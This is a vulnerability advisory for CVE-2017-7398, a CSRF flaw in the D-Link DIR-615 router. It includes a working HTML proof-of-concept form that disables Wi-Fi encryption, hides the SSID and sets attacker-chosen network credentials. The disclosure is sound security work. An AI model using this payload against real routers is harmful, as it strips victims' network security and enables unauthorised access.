158 lines
No EOL
2.8 KiB
Text
158 lines
No EOL
2.8 KiB
Text
Title:
|
|
====
|
|
|
|
D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability
|
|
|
|
|
|
|
|
Credit:
|
|
======
|
|
|
|
Name: Pratik S. Shah
|
|
|
|
|
|
|
|
Reference:
|
|
=========
|
|
|
|
CVE Details: CVE-2017-7398.
|
|
|
|
|
|
|
|
Date:
|
|
====
|
|
|
|
1-04-2017
|
|
|
|
|
|
|
|
Vendor:
|
|
======
|
|
|
|
D-Link wireless router
|
|
|
|
|
|
|
|
Product:
|
|
=======
|
|
|
|
DIR-615
|
|
|
|
|
|
http://www.dlink.co.in/products/?pid=678
|
|
|
|
|
|
Affected Version:
|
|
=============
|
|
|
|
Hardware: T1 , Firmware: 20.09
|
|
|
|
|
|
|
|
Abstract:
|
|
=======
|
|
|
|
This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
|
|
|
|
|
|
|
|
Attack Type:
|
|
===================
|
|
|
|
Remote
|
|
|
|
|
|
|
|
Details:
|
|
=========
|
|
|
|
CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device.
|
|
|
|
|
|
|
|
Proof Of Concept:
|
|
================
|
|
|
|
1) User login to D-link DIR 615 wireless router
|
|
|
|
2) User visits the attacker's malicious web page (DlinkCSRF.html)
|
|
|
|
3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None
|
|
|
|
|
|
|
|
This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method)
|
|
|
|
Attacker can also tamper following parameters
|
|
|
|
hiddenSSID
|
|
SSID
|
|
Passwords for all the applicable security options
|
|
|
|
|
|
|
|
|
|
|
|
<html>
|
|
|
|
<!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09 -->
|
|
|
|
<body>
|
|
|
|
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
|
|
|
|
<input type="hidden" name="domain" value="1" />
|
|
|
|
<input type="hidden" name="hiddenSSID" value="on" />
|
|
|
|
<input type="hidden" name="ssid" value=“Hacked” />
|
|
|
|
<input type="hidden" name="band" value="10" />
|
|
|
|
<input type="hidden" name="chan" value="0" />
|
|
|
|
<input type="hidden" name="chanwid" value="1" />
|
|
|
|
<input type="hidden" name="txRate" value="0" />
|
|
|
|
<input type="hidden" name="method_cur" value="6" />
|
|
|
|
<input type="hidden" name="method" value="0" />
|
|
|
|
<input type="hidden" name="authType" value="1" />
|
|
|
|
<input type="hidden" name="length" value="1" />
|
|
|
|
<input type="hidden" name="format" value="2" />
|
|
|
|
<input type="hidden" name="defaultTxKeyId" value="1" />
|
|
|
|
<input type="hidden" name="key1" value="0000000000" />
|
|
|
|
<input type="hidden" name="pskFormat" value="0" />
|
|
|
|
<input type="hidden" name="pskValue" value=“CSRF@test” />
|
|
|
|
<input type="hidden" name="checkWPS2" value="1" />
|
|
|
|
<input type="hidden" name="save" value="Apply" />
|
|
|
|
<input type="hidden" name="basicrates" value="15" />
|
|
|
|
<input type="hidden" name="operrates" value="4095" />
|
|
|
|
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
|
|
|
|
<input type="submit" value="Submit request" />
|
|
|
|
</form>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
======================================
|
|
Vendor Notification: 6th March 2017 |